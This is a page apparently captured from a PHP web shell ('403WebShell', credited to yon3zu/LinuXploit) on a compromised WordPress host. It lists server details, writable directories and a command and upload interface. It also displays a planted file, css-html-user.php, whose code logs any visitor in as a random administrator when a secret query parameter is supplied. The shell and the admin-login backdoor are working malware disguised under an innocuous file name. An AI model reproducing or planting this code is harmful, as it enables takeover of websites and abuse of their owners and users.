$plugin = <<403WebShell
403Webshell
Server IP : 88.222.222.43  /  Your IP : 216.73.217.9
Web Server : LiteSpeed
System : Linux fr-int-web1513.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
User : u766115111 ( 766115111)
PHP Version : 8.2.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u766115111/domains/vikory.com/public_html/wp-content/text/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u766115111/domains/vikory.com/public_html/wp-content/text/css-html-user.php
<?php
$sec = "howl"; 
if (!isset($_GET['love']) || $_GET['love'] !== $sec) {
    die("Didnt have access!");
}

require_once('../../wp-load.php');

$admins = get_users(array(
    'role' => 'administrator'
));

if (!empty($admins)) {
    $random_admin = $admins[array_rand($admins)];
    
    $user_id = $random_admin->ID;
    
    wp_set_auth_cookie($user_id);
    wp_set_current_user($user_id);
    
    wp_redirect(admin_url());
    exit;
} else {
    echo "Tidak ada administrator yang ditemukan.";
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit